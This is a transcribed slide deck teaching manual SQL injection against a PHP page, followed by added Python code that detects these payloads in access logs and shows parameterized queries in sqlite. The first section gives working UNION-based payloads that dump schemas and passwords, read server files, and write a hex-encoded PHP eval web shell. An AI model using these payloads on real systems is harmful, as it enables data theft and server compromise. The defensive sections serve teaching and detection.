
手工sql注入.ppt (Manual SQL injection)
Manual SQL injection, 16 slides, by bkman

Outline:
1. Manual SQL injection
2. Non-parameterized vs. parameterized SQL
3. IBM Security AppScan Standard

1. Manual SQL injection

Case one: the SQL account has privileges on the information_schema database, and the submitted parameter is not filtered.

Step 1: determine whether the parameter is injectable

    $type = $_GET['type'];
    $sql = "SELECT * FROM news WHERE type=$type";

Step 2: determine how many columns the query selects

    http://192.168.152.111/hm/index.php?type=1 UNION SELECT 1,2,3,4 FROM information_schema.TABLES

Step 3: dump data

    Dump the database directory path:
    UNION SELECT 1,2,datadir,4 FROM information_schema.TABLES

    Dump all database names:
    UNION SELECT 1,2,GROUP_CONCAT(SCHEMA_NAME),4 FROM information_schema.SCHEMATA

    Dump all table names:
    UNION SELECT 1,2,GROUP_CONCAT(TABLE_NAME),4 FROM information_schema.COLUMNS WHERE 1=1 AND TABLE_SCHEMA='test'

    Dump the columns of a table:
    UNION SELECT 1,2,GROUP_CONCAT(column_name),4 FROM information_schema.COLUMNS WHERE 1=1 AND TABLE_SCHEMA='test'

    Dump the data:
    UNION SELECT 1,2,CONCAT(id,'|',name,'|',pass),4 FROM test.user

Case two: no privileges on the information_schema database, and the submitted parameter is not filtered.

Step 1: guess table names

    UNION SELECT 1,2,3,4 FROM user
    UNION SELECT 1,2,3,4 FROM admin
    or: AND (SELECT COUNT(*) FROM user)>0

Step 2: guess column names

    UNION SELECT 1,2,name,4 FROM user
    or: AND (SELECT COUNT(name) FROM user)>0

Exploitation:

1. Read system files
    UNION SELECT 1,2,LOAD_FILE('/etc/php.ini'),4 FROM user
    or: UNION SELECT 1,2,LOAD_FILE(0x2F6574632F7068702E696E69),4 FROM user

2. Write a file
    UNION SELECT 1,2,CONCAT(id,'|',NAME,'|',pass),4 INTO OUTFILE '/tmp/test.txt' FROM user

3. Write a backdoor
    UNION SELECT 1,2,0x3C3F70687020406576616C28245F504F53545B636D645D293F3E,4 INTO OUTFILE '/usr/local/www/test.php' FROM user

2. Non-parameterized vs. parameterized SQL

Non-parameterized SQL:

    $sql = "SELECT * FROM news WHERE type=$type";
    $query = mysql_query($sql);

Parameterized SQL:

    /* original version (escapes the values rather than binding them as parameters) */
    $query = sprintf("SELECT * FROM Users WHERE UserName='%s' AND Password='%s'",
        mysql_real_escape_string($Username),
        mysql_real_escape_string($Password));
    mysql_query($query);

    /* original, advanced version: PHP MySQLi prepared statement */
    $mysqli = new mysqli("localhost", "user", "pass", "database");
    $stmt = $mysqli->prepare("SELECT priv FROM testUsers WHERE username=? AND password=?");
    $stmt->bind_param("ss", $user, $pass);
    $stmt->execute();

    /* PDO, available since PHP 5.1 */
    $dsn = "mysql:host=$db_host;dbname=$db_name";
    $dbh = new PDO($dsn, $db_user, $db_password);
    $sql = "SELECT name, location FROM users WHERE location=? AND name=?";
    $sth = $dbh->prepare($sql);
    $sth->execute(array($location, $name));
    $result = $sth->fetch(PDO::FETCH_OBJ);

As of PHP 5.5.0, mysql_connect is deprecated:

    Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead

3. IBM Security AppScan Standard

End of sharing. Thank you!
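The deck's "case two" and "exploitation" slides describe request shapes (UNION SELECT, information_schema lookups, LOAD_FILE, INTO OUTFILE, hex-encoded literals, COUNT sub-selects) that a defender can look for in web-server access logs. The detector below is an added example, not code from the deck; it URL-decodes the request path of each Common Log Format line and reports which of those indicators it matches. The log lines, the client addresses and the timestamps are constructed for the demonstration; the host, the /hm/index.php path and the payload texts are taken from the deck's own slides.

```python
"""Added example (not from the deck): flag access-log requests that carry the
SQL-injection request shapes shown in the slides."""
import re
from urllib.parse import unquote_plus

# Each indicator is a name plus a case-insensitive pattern run over the decoded request path.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("load_file", re.compile(r"\bload_file\s*\(", re.I)),
    ("into_outfile", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{16,}\b", re.I)),
    ("count_subselect", re.compile(r"\(\s*select\s+count\s*\(", re.I)),
]

# Common Log Format: client ident user [time] "METHOD path PROTOCOL" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample log; the request payloads mirror the deck's slides.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2015:10:00:00 +0800] "GET /hm/index.php?type=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2015:10:00:03 +0800] "GET /hm/index.php?type=1+UNION+SELECT+1,2,3,4+FROM+information_schema.TABLES HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2015:10:00:07 +0800] "GET /hm/index.php?type=1%20UNION%20SELECT%201,2,LOAD_FILE(0x2F6574632F7068702E696E69),4%20FROM%20user HTTP/1.1" 200 9000
10.0.0.9 - - [01/Jan/2015:10:00:09 +0800] "GET /hm/index.php?type=2 HTTP/1.1" 200 500
10.0.0.5 - - [01/Jan/2015:10:00:12 +0800] "GET /hm/index.php?type=1%20AND%20(SELECT%20COUNT(*)%20FROM%20user)%3E0 HTTP/1.1" 200 512
"""


def scan_line(line):
    """Return a finding dict for one log line, or None if it is benign or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, path, status = m.groups()
    decoded = unquote_plus(path)  # %20 and '+' become spaces, so keyword patterns line up
    hits = [name for name, pat in INDICATORS if pat.search(decoded)]
    if not hits:
        return None
    return {"client": client, "time": ts, "method": method, "path": decoded,
            "status": int(status), "indicators": hits}


def scan_log(text):
    """Scan a whole log text; returns one finding per suspicious line, in log order."""
    return [r for r in (scan_line(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["indicators"], finding["path"])
```

The same client issuing several flagged requests in a row, each returning HTTP 200 with a growing response size, is the pattern to alert on; a single UNION keyword in an otherwise legitimate search field is a weaker signal on its own.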
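The deck's section 2 contrasts pasting `$type` into the query text with PDO's prepare/execute. The block below is an added example, not the deck's own code: it reproduces that contrast in Python with sqlite3 so it runs offline, using DB-API parameter binding in place of PDO. The `news` and `user` tables, their rows, and the `type` values fed to the two functions are constructed for the demonstration; the payload has the same shape as the deck's step-2 and step-3 UNION queries.

```python
"""Added example (not from the deck): the vulnerable string-built query beside
its parameterized form, run against a constructed in-memory database."""
import sqlite3


def make_db():
    """Constructed schema mirroring the deck: a 4-column news table and a user
    table whose rows an injected UNION would try to pull into the news result."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news(id INTEGER, type INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 1, 'hello', 'first post');
        INSERT INTO news VALUES (2, 2, 'other', 'second post');
        CREATE TABLE user(id INTEGER, name TEXT, pass TEXT);
        INSERT INTO user VALUES (1, 'admin', 's3cret');
        """
    )
    return conn


def news_by_type_concat(conn, type_param):
    """Non-parameterized query, as on the slide: the request parameter becomes
    part of the SQL text, so any SQL inside it is executed by the database."""
    sql = f"SELECT * FROM news WHERE type={type_param}"
    return conn.execute(sql).fetchall()


def news_by_type_bound(conn, type_param):
    """Parameterized query (the PDO prepare/execute pattern): the parameter is
    handed to the driver separately and can only ever be compared as a value."""
    sql = "SELECT * FROM news WHERE type=?"
    return conn.execute(sql, (type_param,)).fetchall()


# Constructed payload with the same shape as the deck's UNION queries.
PAYLOAD = "1 UNION SELECT id,name,pass,4 FROM user"


if __name__ == "__main__":
    db = make_db()
    print(news_by_type_concat(db, "1"))       # the expected news row only
    print(news_by_type_concat(db, PAYLOAD))   # a user row leaks into the news result
    print(news_by_type_bound(db, PAYLOAD))    # no rows: the payload is just a non-numeric value
```

The bound version returns nothing for the payload because the whole string is compared against the integer `type` column as one value; the escaping-based `sprintf` variant on the slide only helps for quoted string literals, which is why the deck moves on to MySQLi and PDO prepared statements.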